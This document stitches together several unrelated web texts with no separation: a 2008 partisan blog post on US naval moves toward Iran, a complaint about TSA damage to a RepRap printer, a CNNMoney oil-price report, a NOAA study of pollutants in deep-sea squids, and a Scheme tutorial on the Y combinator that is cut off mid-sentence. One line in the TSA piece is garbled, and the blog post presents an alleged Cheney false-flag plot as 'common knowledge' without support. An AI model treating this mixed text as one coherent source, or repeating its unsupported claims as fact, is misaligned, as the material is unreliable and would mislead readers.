Even though the Mainstream News Media has remained quiet on the issue , the United States sending two more aircraft carrier groups to the Middle - East is alarming at this stage of the failed negotiations between the Europeans , the United States , and Israel .
Cheney has been outed for plotting to fabricate a reason for starting a war with Iran - par for the course for a Vice - President that openly shows his disgust for the American people ; now , with two more carrier groups , another nuclear submarine , two ( 2 ) more U.S. destroyers , a supply ship , and who knows what else has entered the Persian Gulf unannounced :
‘2 US aircraft carriers headed for Gulf ’ By ADAM GONN , THE MEDIA LINE NEWS AGENCY 8 -7-08 Two additional United States naval aircraft carriers are heading to the Gulf and the Red Sea , according to the Kuwaiti newspaper Kuwait Times .
While the Kuwaiti daily did not name the ships it believed were heading for the Middle East , The Media Line ’s defense analyst said they could be the USS Theodore Roosevelt and the USS Ronald Reagan .
Meanwhile , the Arabic news agency Moheet reported at the end of July that an unnamed American destroyer , accompanied by two Israeli naval vessels traveled through the Suez Canal from the Mediterranean .
A week earlier , a US nuclear submarine accompanied by a destroyer and a supply ship moved into the Mediterranean , according to Moheet .
More
Make no mistake , we have sent extra naval assets to the Middle - East before , and no attack occurred .
That was before we found out that Dick Cheney was contemplating duplicating speed boats of the type the Iranians use , bring them into the Persian Gulf covertly , and then man them with heavily armed Navy Seals that would engage in a false - flag firefight with one or more of our ships in the Gulf to precipitate our entry into an Iran war .
LINK
This is common knowledge and is posted on numerous sites throughout the Internet .
It ’s extremely hard to avoid war when Darth Cheney is plotting behind the scenes to hatch a plan to force the U.S. into war with Iran , and the eventual outcome of his side - stepping the constitution and the rule of law are apt to cost countless innocent American and Iranian lives .
I have always maintained that if we attack Iran , there will be a furious amount of diplomacy going on behind the scenes between the U.S. , Russia , and China - both of whom we would have to give up tremendous security issues to get them to covertly place their guarded blessings on a US / Israel attack on Iran .
Right now , the stage is being set .
Russia has sent tanks into Georgia LINK and have vowed to protect Russian interests and it looks as if a full - blown conflict / war could evolve from this situation , and the U.S. is currently backing Georgia .
If this Iran attack does happen , you can bet that we will issue harsh warnings and a possible complaint through the U.N. Security Council , but other than that , our threats will be hollow .
You have to give a little to get a little , and the dominoes seem to be falling into place .
What can we do to stop this war from being started ?
I honestly do n’t have an answer to that , and our hope lies with our senior military commanders who have already spoke - out against starting a third war and have been adamant that war with Iran , at this time , is not in our best interests .
Will these same commanders refuse to follow orders and retire immediately , or are we again at the mercy of George Bush and Dick Cheney ?
At this point , no one has a viable answer to those questions , however , sending the increased naval assets to the Persian Gulf when tensions are this high is asking for trouble - and we may find it , far more serious than any of us have been led to believe .
This is a war that will be started because we ’re protecting Israel ’s interests , not our own , and that smacks of sedition to me .
When we place the perceived paranoia and needs of another nation over the safety and welfare of US inhabitants , something is definitely rotten in the cookie jar !
We do have a slight hope , and that ’s for all concerned Americans to light - up your Congressman ’s phone (s ) , unabated , until you receive the answers you want to hear .
Nothing good comes easy , and several times during the past couple of years , we have scored some major successes by banding together and fighting for a common cause .
Keeping the Middle - East “ stable ” appears to be important to all of us , as a disruption of the oil coming out of that area could plunge our economy into a downward spiral that could take generations to recover from - if its salvageable at all !
Today The Washington
Post released a study that indicates even though an attack on Iran might take place , it has serious doubts of actually being successful - and the end result of such an attack may guarantee that Iran will pursue and obtain the “ bomb ” out of frustration and nationalism that would materialize from any large - scale attack directed at Iran :
Study Cautions Against Strike on Iran ’s Nuclear Facilities By Joby Warrick
Washington Post Staff Writer
Friday , August 8 , 2008
A military strike against Iran ’s nuclear facilities would probably only delay the country ’s progress toward nuclear - weapons capability , according to a study that concludes that such an attack could backfire by strengthening Tehran ’s resolve to acquire the bomb .
The analysis by the Washington - based Institute for Science and International Security found that Iran ’s uranium facilities are too widely dispersed and protected — and , in some cases , concealed too well — to be effectively destroyed by warplanes .
And any damage to the country ’s nuclear program could be quickly repaired .
“ Following an attack , Iran could quickly rebuild its centrifuge program in small , easily hidden facilities focused on making weapon - grade uranium for nuclear weapons , ” said principal author David Albright , ISIS president and a former U.N. weapons inspector .
MUCH MORE
Next Page 1 | 2
( Note : You can view every article as one long page if you sign up as an Advocate Member , or higher ) .
On the return journey from OSCON , baggage handling found themselves outclassed .
Instead of simply smacking the box around a few times as had happened on the outbound trip , the TSA dismantled the custom hard - case for the RepRap by removing the 16 bolts securing the top panel rather than undoing the 8 bolts marked " Open " .
Unable to fit the panel back on again - it was not meant to come off so the nuts were not captive - they simply sent it on its way with the panel detached .
I retrieved it from the conveyor - as opposed from the fragile / outsize section despite clear " Fragile " stickers on every face - being shipped in theh wi a u <==s y pconfiguration .
Bits were still spilling out of it .
Two of our suitcases were badly damaged , my daughter 's hard suitcase on a separate return flight was also destroyed .
It was replaced by Air New Zealand with an apology for circumstances genuinely beyond their control .
I recommend that anyone , anywhere shipping any equipment of value by air goes out of their way to avoid having it pass through the United States of America .
Otherwise their badly - trained insecurity chimps and box - throwers will wreck it for you .
Labels : airline , baggage handler , child , damage , destroy , equipment , reprap , tsa , wreck
NEW YORK ( CNNMoney.com ) --
Oil surged more than $ 6 on Thursday to touch $ 122 a barrel , on a falling dollar and rising concerns about global supply .
U.S. crude for October delivery ended $ 5.62 higher at $ 121.18 a barrel , having reached as high as $ 122.04 .
Thursday 's settlement price was the highest close since Aug. 4 , when crude closed at $ 121.41 .
The $ 5.62 jump in the price of crude was the largest single day advance since since June 6 , when oil rose $ 10.75 in a single session .
Thursday 's jump was also the second largest one - day gain in dollar terms since oil has been traded , just behind the advance on June 6 .
Wednesday's $ 114.98 settlement price ended active trading for the September contract .
Weaker dollar :
Oil prices were supported by the falling dollar .
The dollar was down against the euro and the yen on Thursday .
" You have the dollar down over 1 % today and that is a pretty meaningful move for the dollar , " said Brian Hicks , co-manager of the Global Resources Fund at U.S. Global Investors .
When the dollar weakens , investors like commodities as a hedge against inflation .
Investors were " running back to gold , running back to oil , so it seems we are seeing some of the running - back - to - safe haven " behavior , said Phil Flynn , senior market analyst at Alaron Trading .
The value of the dollar is falling because of the weak U.S. economy , which has been dragged down by the struggling financial sector .
With Fannie Mae ( FNM , Fortune 500 ) and Freddie Mac ( FRE , Fortune 500 ) stocks near historic lows and rumors of a federal bailout making Wall Street jittery , investors are more likely to keep their money safe in the steady commodity market , said Neal Dingmann , director of equity research at Dahlman Rose .
" The risk factors are back on the rise with the latest fears about Fannie Mae and Freddie Mac and that seems to have captured the imagination of the market , " said Flynn .
Crude oil is traded in U.S. currency around the globe and so when the dollar weakens , crude oil becomes cheaper for foreign investors .
" If the dollar does fall off , a lot of these guys [ foreign investors ] are able to consume more and buy more on a pure dollar - per - dollar basis , " said Dingmann .
Geopolitical tensions : Russian forces invaded Georgia two weeks ago causing serious political tensions between it and the West .
Those tensions seem to be raising concerns over Russia 's oil supplies , according to Hicks .
" When you consider that Russia is a major exporter of oil outside of OPEC and is a major supplier of oil ... the threat of a supply disruption , " supports Thursday 's surge in the price of oil , said Hicks .
With global supplies very tight , " any disruption could cause a meaningful spike " in the price of oil , he said .
If Russia decided to reduce the amount of oil it was distributing , the price of oil would likely go up .
While Russia has not tightened down yet , " the speculation is that we are drawing closer to the actual realization of any production being pulled offline in Russia , " said Dingmann .
On Wednesday , Poland also agreed to let the U.S. base missile interceptors there .
" Russia has been against this for a long time , " said Mark Waggoner , president of Excel Futures .
The combination of Russian troops in Georgia and its displeasure with Poland agreeing to work with the United States is supporting the price of oil .
" You have more than one geopolitical event , " said Dingmann , so " you see this levered effect . "
Supply report :
The government 's weekly energy supply report , released Wednesday , showed a much bigger - than - expected increase in crude oil stockpiles and a surprise drop in gasoline stockpiles .
The U.S. Energy Information Administration reported that crude oil inventories climbed by 9.4 million barrels .
Gasoline inventories fell by 6.2 million barrels , which came on the heels of a 6.4 million barrel drop in the prior week .
Two consecutive weeks of tumbling gasoline stockpiles may work to prop the price of oil up , as well .
But Flynn does not think the fall off in gasoline inventories is the main reason for this most recent runup .
With the summer driving season nearly finished , " the reason why gas supplies are so tight is because refineries are not making any - demand is not there , " said Flynn .
Cresting the $ 120 mark :
When the market watched crude futures race up to a record - high price of $ 147.27 on July 11 , the market was fueled by fears of economic weakness .
" We are going up for the same reasons we went to the highs - concerns about the dollar , the economy , the Fed 's ability to raise interest rates , " said Flynn .
In the morning , analysts saw $ 120 a barrel as the threshold for the trading session .
After watching oil surge more than $ 6 , however , analysts started to move the bar higher .
" If we close above $ 120 , then the next big number everyone will be talking about would be the $ 125 / $ 130 area , " said Flynn .
New evidence that chemical contaminants are finding their way into the deep - sea food web has been found in deep - sea squids and octopods , including the strange - looking “ vampire squid " .
These species are food for deep - diving toothed whales and other predators .
In a study to be published in the journal Marine Pollution Bulletin , Michael Vecchione of NOAA Fisheries ’ National Systematics Laboratory and colleagues Michael Unger , Ellen Harvey and George Vadas at the Virginia Institute of Marine Science of The College of William and Mary report finding a variety of chemical contaminants in nine species of cephalopods , a class of organisms that includes octopods , squids , cuttlefishes and nautiluses .
“ It was surprising to find measurable and sometimes high amounts of toxic pollutants in such a deep and remote environment , ” Vecchione said .
Among the chemicals detected were tributyltin ( TBT ) , polychlorinated biphenyls ( PCBs ) , brominated diphenyl ethers ( BDEs ) , and dichlorodiphenyl - trichloroethane ( DDT ) .
They are known as persistent organic pollutants ( POPs ) because they do n't degrade and persist in the environment for a very long time .
Cephalopods are important to the diet of cetaceans , a class of marine mammals which includes whales , dolphins and porpoises .
Cephalopods are the primary food for 28 species of odontocetes , the sub - order of cetaceans that have teeth and include beaked , sperm , killer and beluga whales and narwhals as well as dolphins and porpoises .
Recent studies have reported the accumulation of POPs in the blubber and tissues of whales and other predatory marine mammals as well as in some deep - sea fish .
Other investigators had speculated that the pollutants in marine mammals had resulted from feeding on contaminated squids .
However , almost no information existed prior to this study about POPs in deep - sea cephalopods .
Vecchione and colleagues wanted to see if whales had a unique capacity to accumulate pollutants or if they were simply one of the top predators in a contaminated deep - sea food web .
The researchers collected nine species of cephalopods from depths between 1,000 and 2,000 meters ( about 3,300 to 6,600 feet ) in 2003 in the western North Atlantic Ocean using a large mid-water trawl .
Species were selected for chemical analysis based on their importance as prey and included the commercially important short - finned squid Illex illecebrosus , as well as cockatoo squid , “ vampire squid ” , and the large jelly - like octopus Haliphron atlanticus .
Twenty - two specimens were analyzed for a variety of contaminants .
One of the chemical pollutants , TBT , is an additive used to control growth of organisms and is found in antifouling paints for boats , wood preservatives , and many other products .
TBT is an endocrine disrupting compound and has been detected in whales and dolphins .
It has been regulated worldwide since the late 1980s , but has been a concern because of its extreme toxicity to marine invertebrates in the coastal environment .
Other chemical contaminants found in the specimens include polycyclic aromatic hydrocarbons ( PAHs ) , found in all the samples , diphenyl ether ( DPE ) , polychlorinated biphenyls ( PCBs ) , and brominated diphenyl ethers ( BDEs ) .
The researchers also detected DDT , a pesticide banned in the U.S. in the 1970s but still used on a limited basis in some parts of the world to control diseases like malaria .
PCBs are a class of human - produced compounds used to insulate electrical transformers and capacitors and in coatings , sealants , adhesives , paints , wood floor finishes , and even in carbonless copy paper .
PCB production was banned in the U.S. in the 1970s .
BDEs have been used as flame retardants in a variety of household products , from plastics to foam in furniture and fabrics .
“ The cephalopod species we analyzed span a wide range of sizes and represent an important component of the oceanic food web , ” Vecchione said .
“ The fact that we detected a variety of pollutants in specimens collected from more than 3,000 feet deep is evidence that human - produced chemicals are reaching remote areas of the open ocean , accumulating in prey species , and therefore available to higher levels of marine life .
Contamination of the deep - sea food web is happening , and it is a real concern . ”
or :
How to Succeed at Recursion Without Really Recursing
Tiger got to hunt ,
Bird got to fly ;
Lisper got to sit and wonder , ( Y ( Y Y ) ) ?
Tiger got to sleep ,
Bird got to land ;
Lisper got to tell himself he understand .
— Kurt Vonnegut , modified by Darius Bacon
Introduction
I recently wrote a blog post about the Y combinator .
Since then , I 've received so many useful comments that I thought it was appropriate to expand the post into a more complete article .
This article will go into greater depth on the subject , but I hope it 'll be more comprehensible as well .
You do n't need to have read the previous post to understand this one ( in fact , it 's probably better if you have n't . )
The only background knowledge I require is a tiny knowledge of the Scheme programming language including recursion and first - class functions , which I will review .
Comments are ( again ) welcome .
Why Y ?
Before I get into the details of what Y actually is , I 'd like to address the question of why you , as a programmer , should bother to learn about it .
To be honest , there are n't a lot of good nuts - and - bolts practical reasons for learning about Y .
Even though it does have a few practical applications , for the most part it 's mainly of interest to computer language theorists .
Nevertheless , I do think it 's worth your while to know something about Y for the following reasons :
It 's one of the most beautiful ideas in all of programming .
If you have any sense of programming aesthetics , you 're sure to be delighted by Y .
It shows in a very stark way how amazingly powerful the simple ideas of functional programming are .
In 1959 , the British scientist C. P .
Snow gave a famous lecture called The Two Cultures where he bemoaned the fact that many intelligent and well - educated people of the time had almost no knowledge of science .
He used knowledge of the Second Law of Thermodynamics as a kind of dividing line between those who were scientifically literate and those who were n't .
I think we can similarly use knowledge of the Y combinator as a dividing line between programmers who are " functionally literate " ( i.e. have a reasonably deep knowledge of functional programming ) and those who are n't .
There are other topics that could serve just as well as Y ( notably monads ) , but Y will do nicely .
So if you aspire to have the True Lambda - Nature , read on .
By the way , Paul Graham ( the Lisp hacker , Lisp book author , essayist , and now venture capitalist ) apparently thinks so highly of Y that he named his startup incubator company Y Combinator .
Paul got rich from his knowledge of ideas like these ; maybe someone else will too .
Maybe even you .
A puzzle
Factorials
We 'll start our exploration of the Y combinator by defining some functions to compute factorials .
The factorial of a non-negative integer n is the product of all integers starting from 1 and going up to and including n .
Thus we have :
factorial 1 = 1 factorial 2 = 2 * 1 = 2 factorial 3 = 3 * 2 * 1 = 6 factorial 4 = 4 * 3 * 2 * 1 = 24
and so on .
( I 'm using a function notation without parentheses here , so factorial 3 is the same as what is usually written as factorial ( 3 ) .
Humor me . )
Factorials increase very rapidly with increasing n ; the factorial of 20 is 2432902008176640000 .
The factorial of 0 is defined to be 1 ; this turns out to be the appropriate definition for the kinds of things factorials are actually used for ( like solving problems in combinatorics ) .
Recursive definitions of the factorial function
It 's easy to write a function in a programming language to compute factorials using some kind of a looping control construct like a while or for loop ( e.g. in C or Java ) .
However , it 's also easy to write a recursive function to compute factorials , because factorials have a very natural recursive definition :
factorial 0 = 1 factorial n = n * factorial ( n - 1 )
where the second line applies for all n greater than zero .
In fact , in the computer language Haskell , that 's the way you actually define the factorial function .
In Scheme , the language we 'll be using here , this function would be written like this :
( define ( factorial n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) )
Scheme uses a parenthesized prefix notation for everything , so something like (- n 1 ) represents what is usually written n - 1 in most programming languages .
The reasons for this are beyond the scope of this article , but getting used to this notation is n't very hard .
In fact , the above definition of the factorial function in Scheme could also be written in a slightly more explicit way as follows :
( define factorial ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) ) )
The keyword lambda simply indicates that the thing we 're defining ( i.e. whatever is enclosed by the open parenthesis to the immediate left of the lambda and its corresponding close parenthesis ) is a function .
What comes immediately after the word lambda , in parentheses , are the formal arguments of the function ; here there is just one argument , which is n .
The body of the function comes after the formal arguments , and here consists of the expression ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) .
This kind of function is an anonymous function .
Here you do give the anonymous function the name factorial after you 've defined it , but you do n't have to , and often it 's handy not to if you 're only going to be using it once .
In Scheme and some other languages , anonymous functions are also called lambda expressions .
Many programming languages besides Scheme allow you to define anonymous functions , including Python , Ruby , Javascript , Ocaml , and Haskell ( but not C , C++ , or Java , unfortunately ) .
We 'll be using lambda expressions a lot below .
In the Scheme language , the definition of factorial just given is identical to the one before it ;
Scheme simply translates the first definition into the second one before evaluating it .
So all functions in Scheme are really lambda expressions .
Note that the body of the function has a call to the factorial function ( which we 're in the process of defining ) inside it , which makes this a recursive definition .
I will call this kind of definition , where the name of the function being defined is used in the body of the function , an explicitly recursive definition .
( You might wonder what an " implicitly recursive " function would be .
I 'm not going to use that expression , but the notion I have in mind is a recursive function which is generated through non-recursive means — keep reading ! )
For the sake of argument , we 're going to assume that our version of Scheme does n't have the equivalent of for or while loops in C or Java ( although in fact , real Scheme implementations do have such constructs , but under a different name ) , so that in order to define a function like factorial , we pretty much have to use recursion .
Scheme is often used as a teaching language partly for this reason : it forces students to learn to think recursively .
Functions as data and higher - order functions
Scheme is a cool language for many reasons , but one that is relevant to us here is that it allows you to use functions as " first class " data objects ( this is often expressed by saying that Scheme supports first - class functions ) .
This means that in Scheme , we can pass a function to another function as an argument , we can return a function as the result of evaluating another function applied to its arguments , and we can create functions on - the - fly as we need them ( using the lambda notation shown above ) .
This is the essence of functional programming , and it will feature prominently in the ensuing discussion .
Functions which take other functions as arguments , and / or which return other functions as their results , are usually referred to as higher - order functions .
Eliminating explicit recursion
Now , here 's the puzzle : what if you were asked to define the factorial function in Scheme , but were told that you could not use recursive function calls in the definition ( for instance , in the factorial function given above you cannot use the word factorial anywhere in the body of the function ) .
However , you are allowed to use first - class functions and higher - order functions any way you see fit .
With this knowledge , can you define the factorial function ?
The answer to this question is yes , and it will lead us directly to the Y combinator .
What the Y combinator is and what it does
The Y combinator is a higher - order function .
It takes a single argument , which is a function that is n't recursive .
It returns a version of the function which is recursive .
We will walk through this process of generating recursive functions from non-recursive ones using Y in great detail below , but that 's the basic idea .
More generally , Y gives us a way to get recursion in a programming language that supports first - class functions but that does n't have recursion built in to it .
So what Y shows us is that such a language already allows us to define recursive functions , even though the language definition itself says nothing about recursion .
This is a Beautiful Thing : it shows us that functional programming alone can allow us to do things that we would never expect to be able to do ( and it 's not the only example of this ) .
Lazy or strict evaluation ?
We will be looking at two broad classes of computer languages : those that use lazy evaluation and those that use strict evaluation .
Lazy evaluation means that in order to evaluate an expression in the language , you only evaluate as much of the expression as is needed to get the final result .
So ( for instance ) if there is a part of the expression that does n't need to get evaluated ( because the result will not depend on it ) it wo n't be evaluated .
In contrast , strict evaluation means that all parts of an evaluation will be evaluated completely before the value of the expression as a whole is determined ( with some necessary exceptions , such as if expressions , which have to be lazy to work properly ) .
In practice , lazy evaluation is more general , but strict evaluation is more predictable and often more efficient .
Most programming languages use strict evaluation .
The programming language Haskell uses lazy evaluation , and this is one of the most interesting things about that language .
We will use both kinds of evaluation in what follows .
One Y combinator or many ?
Even though we often refer to Y as " the " Y combinator , in actual fact there are an infinite number of Y combinators .
We will only be concerned with two of these , one lazy and one strict .
We need two Y combinators because the Y combinator we define for lazy languages will not work for strict languages .
The lazy Y combinator is often referred to as the normal - order Y combinator and the strict one is referred to as the applicative - order Y combinator .
Basically , normal - order is another way of saying " lazy " and applicative - order is another way of saying " strict " .
Static or dynamic typing ?
Another big dividing line in programming languages is between static typing and dynamic typing .
A statically - typed language is one where the types of all expressions are determined at compile time , and any type errors cause the compilation to fail .
A dynamically - typed language does n't do any type checking until run time , and if a function is applied to arguments of invalid types ( e.g. by trying to add together an integer and a string ) , then an error is reported .
Among commonly - used programming languages , C , C++ and Java are statically typed , and Perl , Python and Ruby are dynamically typed .
Scheme ( the language we 'll be using for our examples ) is also dynamically typed .
( There are also languages that straddle the border between statically - typed and dynamically - typed , but I wo n't discuss this further . )
One often hears static typing referred to as strong typing and dynamic typing referred to as weak typing , but this is an abuse of terminology .
Strong typing simply means that every value in the language has one and only one type , whereas weak typing means that some values can have multiple types .
So Scheme , which is dynamically typed , is also strongly typed , while C , which is statically typed , is weakly typed ( because you can cast a pointer to one kind of object into a pointer to another type of object without altering the pointer 's value ) .
I will only be concerned with strongly typed languages here .
It turns out to be much simpler to define the Y combinator in dynamically typed languages , so that 's what I 'll do .
It is possible to define a Y combinator in many statically typed languages , but ( at least in the examples I 've seen ) such definitions usually require some non-obvious type hackery , because the Y combinator itself does n't have a straightforward static type .
That 's beyond the scope of this article , so I wo n't mention it further .
What a " combinator " is
A combinator is just a lambda expression with no free variables .
We saw above what lambda expressions are ( they 're just anonymous functions ) , but what 's a free variable ?
It 's a variable ( i.e. a name or identifier in the language ) which is n't a bound variable .
Happy now ?
No ?
OK , let me explain .
A bound variable is simply a variable which is contained inside the body of a lambda expression that has that variable name as one of its arguments .
Let 's look at some examples of lambda expressions and free and bound variables :
( lambda ( x ) x ) ( lambda ( x ) y ) ( lambda ( x ) ( lambda ( y ) x ) ) ( lambda ( x ) ( lambda ( y ) ( x y ) ) ) ( x ( lambda ( y ) y ) ) ( ( lambda ( x ) x ) y )
Are the variables in the body of these lambda expressions free variables or bound variables ?
We 'll ignore the formal arguments of the lambda expressions , because only variables in the body of the lambda expression can be considered free or bound .
As for the other variables , here are the answers :
The x in the body of the lambda expression is a bound variable , because the formal argument of the lambda expression is also x .
This lambda expression has no other variables , therefore it has no free variables , therefore it 's a combinator .
The y in the lambda body is a free variable .
This lambda expression is therefore not a combinator .
Aside from the formal arguments of the lambda expression , there is only one variable , the final x , which is a bound variable ( it 's bound by the formal argument of the outer lambda expression ) .
Therefore , this lambda expression as a whole has no free variables , so this is a combinator .
Aside from the formal arguments of the lambda expression , there are two variables , the final x and y , both bound variables .
This is a combinator .
The entire expression is not a lambda expression , so it 's by definition not a combinator .
Nevertheless , the x is a free variable and the final y is a bound variable .
Again , the entire expression is n't a lambda expression ( it 's a function application ) , so this is n't a combinator either .
The second x is a bound variable while the y is a free variable .
When you 're wondering if a recursive function like factorial :
( define factorial ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) ) )
is a combinator , you do n't consider the define part , so what you 're really asking is if
( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) )
is a combinator .
Since in this lambda expression , the name factorial represents a free variable ( the name factorial is not a formal argument of the lambda expression ) , this is not a combinator .
This will be important below .
In fact , the names = , * , and - are also free variables , so even without the name factorial this would not be a combinator ( to say nothing of the numbers ! ) .
Back to the puzzle
Abstracting out the recursive function call
Recall the factorial function we had previously :
( define factorial ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) ) )
What we want to do is to come up with a version of this that does the same thing but does n't have that pesky recursive call to factorial in the body of the function .
Where do we start ?
It would be nice if you could save all of the function except for the offending recursive call , and put something else there .
That might look like this :
( define sort - of - factorial ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( <???> (- n 1 ) ) ) ) ) )
This still leaves us with the problem of what to put in the place marked <???> .
It 's a tried - and - true principle of functional programming that if you do n't know exactly what you want to put somewhere in a piece of code , just abstract it out and make it a parameter of a function .
The easiest way to do this is as follows :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) )
What we 've done here is to rename the recursive call to factorial to f , and to make f an argument to a function which we 're calling almost - factorial .
Notice that almost - factorial is not at all the factorial function .
Instead , it 's a higher - order function which takes a single argument f , which had better be a function ( or else ( f (- n 1 ) ) wo n't make sense ) , and returns another function ( the ( lambda ( n ) ... ) part ) which ( hopefully ) will be a factorial function if we choose the right value for f .
It 's important to realize that this trick is not in any way specific to the factorial function .
We can do exactly the same trick with any recursive function .
For instance , consider a recursive function to compute fibonacci numbers .
The recursive definition of fibonacci numbers is as follows :
fibonacci 0 = 0 fibonacci 1 = 1 fibonacci n = fibonacci ( n - 1 ) + fibonacci ( n - 2 )
( In fact , that 's the definition of the fibonacci function in Haskell . )
In Scheme , we can write the function this way :
( define fibonacci ( lambda ( n ) ( cond ( ( = n 0 ) 0 ) ( (= n 1 ) 1 ) ( else (+ ( fibonacci (- n 1 ) ) ( fibonacci (- n 2 ) ) ) ) ) ) )
( where cond is just a shorthand expression for nested if expressions ) .
We can then remove the explicit recursion just like we did for factorial :
( define almost - fibonacci ( lambda ( f ) ( lambda ( n ) ( cond ( ( = n 0 ) 0 ) ( (= n 1 ) 1 ) ( else (+ ( f (- n 1 ) ) ( f (- n 2 ) ) ) ) ) ) ) )
As you can see , the transformation from a recursive function to a non-recursive almost - equivalent function is a purely mechanical one : you rename the name of the recursive function inside the body of the function to f and you wrap a ( lambda ( f ) ... ) around the body .
If you 've followed what I just did ( never mind why I did it ; we 'll see that later ) , then congratulations !
As Yoda says , you 've just taken the first step into a larger world .
Sneak preview
I probably should n't do this yet , but I 'm going to give you a sneak preview of where we 're going .
Once we define the Y combinator , we 'll be able to define the factorial function using almost - factorial as follows :
( define factorial ( Y almost - factorial ) )
where Y is the Y combinator .
Note that this definition of factorial does n't have any explicit recursion in it .
Similarly , we can define the fibonacci function using almost - fibonacci in the same way :
( define fibonacci ( Y almost - fibonacci ) )
So the Y combinator will give us recursion wherever we need it as long as we have the appropriate almost - function available ( i.e. the non-recursive function derived from the recursive one by abstracting out the recursive function calls ) .
Read on to see what 's really going on here and why this will work .
Recovering factorial from almost - factorial
Let 's assume , for the sake of argument , that we already had a working factorial function lying around ( recursive or not , we do n't care ) .
We 'll call that hypothetical factorial function factorialA .
Now let 's consider the following :
( define factorialB ( almost - factorial factorialA ) )
Question : does factorialB actually compute factorials ?
To answer this , it 's helpful to expand out the definition of almost - factorial :
( define factorialB ( ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) factorialA ) )
Now , by substituting factorialA for f inside the body of the lambda expression we get :
( define factorialB ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorialA (- n 1 ) ) ) ) ) )
This looks a lot like the recursive factorial function , but it is n't : factorialA is not the same function as factorialB .
So it 's a non-recursive function that depends on a hypothetical factorialA function to work .
Does it actually work ?
Well , it 's pretty obvious that it should work for n = 0 , since ( factorialB 0 ) will just return 1 ( the factorial of 0 ) .
If n > 0 , then the value of ( factorialB n ) will be (* n ( factorialA (- n 1 ) ) ) .
Now , we assumed that factorialA would correctly compute factorials , so ( factorialA (- n 1 ) ) is the factorial of n - 1 , and therefore (* n ( factorialA (- n 1 ) ) ) is the factorial of n ( by the definition of factorial ) , thus proving that factorialB computes the factorial function correctly as long as factorialA does .
So this works .
The only problem is that we do n't actually have a factorialA lying around .
Now , if you 're really clever , you might be asking yourself whether we can just do this :
( define factorialA ( almost - factorial factorialA ) )
The idea is this : let 's assume that factorialA is a valid factorial function .
Then if we pass it as an argument to almost - factorial , the resulting function will have to be a valid factorial function , so why not just name that function factorialA ?
It looks like you 've created a perpetual - motion machine ( or perhaps I should say a perpetual - calculation machine ) , and there must be something wrong with this definition ... must n't there ?
In fact , this definition will work fine as long as the Scheme language you 're using uses lazy evaluation !
Standard Scheme uses strict evaluation , so it wo n't work ( it 'll go into an infinite loop ) .
If you use DrScheme as your Scheme interpreter ( which you should ) , then you can use the " lazy Scheme " language level , and the above code will actually work ( huzzah ! ) .
We 'll see why below , but for now I want to stick to standard ( strict ) Scheme and approach the problem in a slightly different way .
Let 's define a couple of functions :
( define identity ( lambda ( x ) x ) ) ( define factorial0 ( almost - factorial identity ) )
The identity function is pretty simple : it takes in a single argument and returns it unchanged ( it 's also a combinator , as I hope you can tell ) .
We 're basically going to use it as a placeholder when we need to pass a function as an argument and we do n't know what function we should pass .
factorial0 is more interesting .
It 's a function that can compute some , but not all factorials .
Specifically , it can compute the factorials up to and including the factorial of zero ( which means that it can only compute the factorial of zero , but you 'll soon see why I describe it this way ) .
Let 's verify that :
( factorial0 0 ) ==> ( ( almost - factorial identity ) 0 ) == > ( ( ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) identity ) 0 ) == > ( ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( identity (- n 1 ) ) ) ) ) 0 ) == > ( if ( = 0 0 ) 1 (* 0 ( identity (- 0 1 ) ) ) ) ==> ( if #t 1 (* 0 ( identity (- 0 1 ) ) ) ) ==> 1
OK , so it works .
Unfortunately , it wo n't work for n > 0 .
For instance , if n = 1 then we 'll have ( skipping a few obvious steps ) :
( factorial0 1 ) ==> (* 1 ( identity (- 1 1 ) ) ) ==> (* 1 ( identity 0 ) ) ==> (* 1 0 ) ==> 0
which is not the correct answer .
Now consider this spiffed - up version of factorial0 :
( define factorial1 ( almost - factorial factorial0 ) )
which is the same thing as :
( define factorial1 ( almost - factorial ( almost - factorial identity ) ) )
This will correctly compute the factorials of 0 and 1 , but it will be incorrect for any n > 1 .
Let 's verify this as well , again skipping some obvious steps :
( factorial1 0 ) ==> ( ( almost - factorial factorial0 ) 0 ) ==> 1 ( via essentially the same derivation we showed above ) ( factorial1 1 ) == > ( ( almost - factorial factorial0 ) 1 ) == > ( ( ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) factorial0 ) 1 ) == > ( ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( factorial0 (- n 1 ) ) ) ) ) 1 ) == > ( if ( = 1 0 ) 1 (* 1 ( factorial0 (- 1 1 ) ) ) ) ==> ( if #f 1 (* 1 ( factorial0 (- 1 1 ) ) ) ) ==> (* 1 ( factorial0 (- 1 1 ) ) ) ==> (* 1 ( factorial0 0 ) ) ==> (* 1 1 ) ==> 1
which is the correct answer .
So factorial1 can compute factorials for n = 0 and n = 1 .
You can verify , though , that it wo n't be correct for n > 1 .
We can keep going , and define functions which can compute factorials up to any particular limit :
( define factorial2 ( almost - factorial factorial1 ) ) ( define factorial3 ( almost - factorial factorial2 ) ) ( define factorial4 ( almost - factorial factorial3 ) ) ( define factorial5 ( almost - factorial factorial4 ) ) etc .
factorial2 will compute correct factorials for inputs between 0 and 2 , factorial3 will compute correct factorials for inputs between 0 and 3 , and so on .
You should be able to verify this for yourself using the above derivations as models , though you probably wo n't be able to do it in your head ( at least , I ca n't do it in my head ) .
One interesting way of looking at this is that almost - factorial takes in a crappy factorial function and outputs a factorial function that is slightly less crappy , in that it will handle exactly one extra value of the input correctly .
Note that you can again rewrite the definitions of the factorial functions like this :
